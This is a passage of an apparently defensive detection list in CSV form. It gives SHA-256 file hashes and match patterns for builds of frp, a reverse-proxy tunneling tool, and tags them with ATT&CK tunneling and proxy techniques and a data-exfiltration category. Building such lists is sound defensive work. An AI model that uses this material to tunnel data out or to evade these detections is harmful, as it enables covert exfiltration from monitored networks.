Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*2330aca22b29fd0298adffe2e57f8eeea5837f09abdcbf11b58c128249d2f89f*",".{0,1000}2330aca22b29fd0298adffe2e57f8eeea5837f09abdcbf11b58c128249d2f89f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*23705712274935b9b223412bf731ecd672dcc8b5d0c11a39372aacedaa6a66a4*",".{0,1000}23705712274935b9b223412bf731ecd672dcc8b5d0c11a39372aacedaa6a66a4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2379c3dc7bf783334051c06aec97ffb50007c9d17572aae45500f07c764ab99a*",".{0,1000}2379c3dc7bf783334051c06aec97ffb50007c9d17572aae45500f07c764ab99a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*23bafd6bf4ac0e631b37bcdc68827f4b36f06c3dcf0bd754f5d0f9acb4606a3b*",".{0,1000}23bafd6bf4ac0e631b37bcdc68827f4b36f06c3dcf0bd754f5d0f9acb4606a3b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*24395170dfc41544eceeb78529c8de5b57b65250c27a02e058cd013e6f66097f*",".{0,1000}24395170dfc41544eceeb78529c8de5b57b65250c27a02e058cd013e6f66097f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*24fccce2e9c6684480bfd8ac0e9ea3e36d4203922fa5a39ae9f63bc0542f68f5*",".{0,1000}24fccce2e9c6684480bfd8ac0e9ea3e36d4203922fa5a39ae9f63bc0542f68f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*25431755a121c12dab3c28fec18eaef027a73aa5e9780b33f6801e152e42ab36*",".{0,1000}25431755a121c12dab3c28fec18eaef027a73aa5e9780b33f6801e152e42ab36.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*26acab3487be8980460ef86f0fdc7a446cfdadab02a5a0b27dc760ecce15ffc2*",".{0,1000}26acab3487be8980460ef86f0fdc7a446cfdadab02a5a0b27dc760ecce15ffc2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*26c48aa4fa4458ad29d0de364904e24be40424d4f6c37005c2c2d9c6e41e2b06*",".{0,1000}26c48aa4fa4458ad29d0de364904e24be40424d4f6c37005c2c2d9c6e41e2b06.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*26eb992318437fad2d122ef76cfb3086f1339201486a1cdec910fe1a457ac383*",".{0,1000}26eb992318437fad2d122ef76cfb3086f1339201486a1cdec910fe1a457ac383.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*275b254a20dfda754d6aba28d335a392df74150d6945d2da20a7c5718dc2c001*",".{0,1000}275b254a20dfda754d6aba28d335a392df74150d6945d2da20a7c5718dc2c001.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2809d84eb3f9bbc8bb73596d8826e112ebb455aa6228ff0eeff28dc6264ef6e6*",".{0,1000}2809d84eb3f9bbc8bb73596d8826e112ebb455aa6228ff0eeff28dc6264ef6e6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*291fa7918aa575802ced2fb77e45f33a3cf7fc4b5c27c4ac31a68b2506c50a30*",".{0,1000}291fa7918aa575802ced2fb77e45f33a3cf7fc4b5c27c4ac31a68b2506c50a30.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2ab7b66c09391d9d76bd7a4818e85fb3818a10a46c91a804b982d7d4c9fddce3*",".{0,1000}2ab7b66c09391d9d76bd7a4818e85fb3818a10a46c91a804b982d7d4c9fddce3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2c02d8f219e83bea4bb4c9ddf1222bdabc068f656992e967dc702e70a1aafd80*",".{0,1000}2c02d8f219e83bea4bb4c9ddf1222bdabc068f656992e967dc702e70a1aafd80.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2d07711a0e24e3da968ad69aeeb458854572788e7869d276fcfb1189c824f9ff*",".{0,1000}2d07711a0e24e3da968ad69aeeb458854572788e7869d276fcfb1189c824f9ff.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*2df23e00a1d18a2291f17cbea17c1e4981e43ed09de3608197bb9a62c104c553*",".{0,1000}2df23e00a1d18a2291f17cbea17c1e4981e43ed09de3608197bb9a62c104c553.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2e1a85c3cfa7cbbcb8747f53de4d7c913cd8ace7475988d823ca0e30bdcfa44e*",".{0,1000}2e1a85c3cfa7cbbcb8747f53de4d7c913cd8ace7475988d823ca0e30bdcfa44e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2e935829f4623f148f3d97424f8863452ac19cf2edc1a659af7500428b894b47*",".{0,1000}2e935829f4623f148f3d97424f8863452ac19cf2edc1a659af7500428b894b47.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*2fae90ae2544f8b46582cfb7d46984d837b193601b35aa9d63c2f4f52007e32b*",".{0,1000}2fae90ae2544f8b46582cfb7d46984d837b193601b35aa9d63c2f4f52007e32b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*30199cd67bbed08c65f86c2420f0967491cad2ec791c97936666bc930d65e73e*",".{0,1000}30199cd67bbed08c65f86c2420f0967491cad2ec791c97936666bc930d65e73e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*30b14705cdfcc4fbc654b55863d110a99deaa92a1490561e8dfd84326f9a9e9c*",".{0,1000}30b14705cdfcc4fbc654b55863d110a99deaa92a1490561e8dfd84326f9a9e9c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3262dee2fa68eb8d9428d209b2e87c2293d007529898850874b19707088c416e*",".{0,1000}3262dee2fa68eb8d9428d209b2e87c2293d007529898850874b19707088c416e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*32665745aaf03d263a9ce87f0ea7a17eb3476328c25c1a1fcccd0925934f7313*",".{0,1000}32665745aaf03d263a9ce87f0ea7a17eb3476328c25c1a1fcccd0925934f7313.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*33893a93b57e6509132b4d6ae29f3e8a1f4c105c21746f0f0f036df0cf8d1979*",".{0,1000}33893a93b57e6509132b4d6ae29f3e8a1f4c105c21746f0f0f036df0cf8d1979.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*33e46384b3caa71163ac79470de2af0cca5f8ea7593a9c9ea4e714dd66c099f5*",".{0,1000}33e46384b3caa71163ac79470de2af0cca5f8ea7593a9c9ea4e714dd66c099f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*351b90825fb48695f36208f0e6cfbbd53f9539306119b5ca0aeb949bd255066a*",".{0,1000}351b90825fb48695f36208f0e6cfbbd53f9539306119b5ca0aeb949bd255066a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*35386af9e43ed1948faa7037050573eda3299d4a11061734fce5f4be51c56dd3*",".{0,1000}35386af9e43ed1948faa7037050573eda3299d4a11061734fce5f4be51c56dd3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*36ea25323b263a1ac1d300a2bd8267905eaa7d752fd9e7d7b4ec40f836c737a6*",".{0,1000}36ea25323b263a1ac1d300a2bd8267905eaa7d752fd9e7d7b4ec40f836c737a6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3961db6d3c5951da49b40cfdae22c8fd53ea87a2ff97245d8aadd4d4206c6fea*",".{0,1000}3961db6d3c5951da49b40cfdae22c8fd53ea87a2ff97245d8aadd4d4206c6fea.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3b9f8b80f13f20194490851b076186124b67b9a7845b32e5e035ae4aed2e45dc*",".{0,1000}3b9f8b80f13f20194490851b076186124b67b9a7845b32e5e035ae4aed2e45dc.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3c4e769a29f03bcc9e998adcd1281142abfb5ff1dd66da5a435830a1cff34217*",".{0,1000}3c4e769a29f03bcc9e998adcd1281142abfb5ff1dd66da5a435830a1cff34217.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*3c582f611716c77db5e4f69823fc72572006608f63d9859dea598f0dfc74ed0b*",".{0,1000}3c582f611716c77db5e4f69823fc72572006608f63d9859dea598f0dfc74ed0b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3c9e03e28899ba18e42f51006f7d94192fbae009885fd91cfc75b354cffebf58*",".{0,1000}3c9e03e28899ba18e42f51006f7d94192fbae009885fd91cfc75b354cffebf58.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3cc79f9fc44300aed80988b31845328b428c0999572eb7f1df949eccee0f518e*",".{0,1000}3cc79f9fc44300aed80988b31845328b428c0999572eb7f1df949eccee0f518e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3cd7ec9209b973520d47d784a09a368bfb9e2bb195f3c543ae5311720249e315*",".{0,1000}3cd7ec9209b973520d47d784a09a368bfb9e2bb195f3c543ae5311720249e315.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*3ce4df319c7ea35f8cfa13d1e03a0309fc4f57aeaaa02d05fb9fd560443e67ba*",".{0,1000}3ce4df319c7ea35f8cfa13d1e03a0309fc4f57aeaaa02d05fb9fd560443e67ba.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3f75d981d58670ce7e0e3f5ead2bd3359cdd1f33b96da726c62013567a884639*",".{0,1000}3f75d981d58670ce7e0e3f5ead2bd3359cdd1f33b96da726c62013567a884639.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3f9462f9c7aad6fec22159529b1db7382acd7254605894fbc44c7a7c464e148b*",".{0,1000}3f9462f9c7aad6fec22159529b1db7382acd7254605894fbc44c7a7c464e148b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3fabb19b2157709cb6baea755513f38b2d5674539b54f7853454c48c5a9f22bf*",".{0,1000}3fabb19b2157709cb6baea755513f38b2d5674539b54f7853454c48c5a9f22bf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*3fcf04657f8efd6c6418047bb8c219878c913c4bdc678a8c4bbc8a49d3a389d1*",".{0,1000}3fcf04657f8efd6c6418047bb8c219878c913c4bdc678a8c4bbc8a49d3a389d1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*3fd70ccfab20e75b8517627ec58e30b33003a24ca4629ed42650ef1b98f17e7d*",".{0,1000}3fd70ccfab20e75b8517627ec58e30b33003a24ca4629ed42650ef1b98f17e7d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*40d5025cb0b0a6f26cc79fd23fc78ccdfa050bd7e80d694f2039ab98093f831d*",".{0,1000}40d5025cb0b0a6f26cc79fd23fc78ccdfa050bd7e80d694f2039ab98093f831d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*410422844c6e562b64f05a07c069860f94c5da5e3971409a1159e066bb450158*",".{0,1000}410422844c6e562b64f05a07c069860f94c5da5e3971409a1159e066bb450158.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*41a3a760ab0e04271f8bee1fd80011ce8e93a8455f78919864bcb13200f758f5*",".{0,1000}41a3a760ab0e04271f8bee1fd80011ce8e93a8455f78919864bcb13200f758f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*41c75d72848375144e46b9b9fe56168f365ce4bee56280757dada6c92bb8abc0*",".{0,1000}41c75d72848375144e46b9b9fe56168f365ce4bee56280757dada6c92bb8abc0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*41f1014ee2ee7ed0a6e989deb937af9a8c01f4974fc1ef541583065475511d65*",".{0,1000}41f1014ee2ee7ed0a6e989deb937af9a8c01f4974fc1ef541583065475511d65.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*429aab2804d7431f684c6d409342af57381dbcafc4b37c49606063be2f92d4a3*",".{0,1000}429aab2804d7431f684c6d409342af57381dbcafc4b37c49606063be2f92d4a3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*429b1032624f2fa211d31521f1d7f3703c022e476f6e225325842500eb3a37c6*",".{0,1000}429b1032624f2fa211d31521f1d7f3703c022e476f6e225325842500eb3a37c6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*43534e7300dc4de9b8dc796f15ff168eb017fd8e895ad73b183ce71dbe0b9beb*",".{0,1000}43534e7300dc4de9b8dc796f15ff168eb017fd8e895ad73b183ce71dbe0b9beb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*45f65dafd172f3a5e05eabf3d4efbb954c92a88851a027f79c19f61a10b78287*",".{0,1000}45f65dafd172f3a5e05eabf3d4efbb954c92a88851a027f79c19f61a10b78287.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4669cb8c374ff0ec48c0f6d15a939c59390c2109645914dd52d4deca519c084d*",".{0,1000}4669cb8c374ff0ec48c0f6d15a939c59390c2109645914dd52d4deca519c084d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*466fba9c2e3bb99aaaa0041443a360a4fef5ccbb869e995b8f60dc0a3ef70e08*",".{0,1000}466fba9c2e3bb99aaaa0041443a360a4fef5ccbb869e995b8f60dc0a3ef70e08.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*46b6b8e83ccbbbc2e639c852dae9a41e79f8523d444fe39f9d8f7cc5e7661081*",".{0,1000}46b6b8e83ccbbbc2e639c852dae9a41e79f8523d444fe39f9d8f7cc5e7661081.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4794997fffc632dd8d357e9d00ca616e9efb2741e0f0acd1599f90be6281b9e6*",".{0,1000}4794997fffc632dd8d357e9d00ca616e9efb2741e0f0acd1599f90be6281b9e6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*4aed98c21ef4534951b6faeab4982376695ae1e10ca90aedd27a9bfcf6caea2e*",".{0,1000}4aed98c21ef4534951b6faeab4982376695ae1e10ca90aedd27a9bfcf6caea2e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
